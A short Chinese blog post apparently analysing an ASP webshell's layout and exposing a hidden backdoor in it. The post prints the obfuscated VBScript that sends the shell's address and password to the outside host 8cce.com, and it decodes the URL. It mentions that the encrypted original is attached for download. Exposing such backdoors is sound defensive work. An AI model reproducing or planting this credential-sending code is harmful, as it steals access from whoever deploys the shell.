这个shell的特点是排版较其他的不一样,采用的不是一般的左边菜单右边上边框架的模式,而是上下框架的模式。
上图看下
加密比较简单,不说了
同样是有后门的。
if Instr(u,”127.0.0.1″)<>0 or Instr(u,”192.168.”)<>0 or Instr(u,”http://“)<>0 then
else
if session(“servec”)=1 then
session(“servec”)=session(“servec”)+1
RRS”http://“&chr(37)&”38″&chr(37)&”63%63″&chr(101)&”%2E”&chr(37)&”63%6f”&chr(37)&”6d/%”&(61)&”%”&(62)&”/?%75=”&u&”&%70=”&Userpwd&”‘)””>”
‘else
if Action<>“” then
session(“servec”)=session(“servec”)+1
end if
end if
end if后门在本地解析出来时http://8cce.com/ab/?u=localhost/1.asp&p=123,同样发送shell的地址和密码给8cce.com
附件中位原始加密版本:
点击下载此文件
最开始出于共享的目的,发布了解密的源码,但是很多朋友劝说我,那么解密文件就不发布了。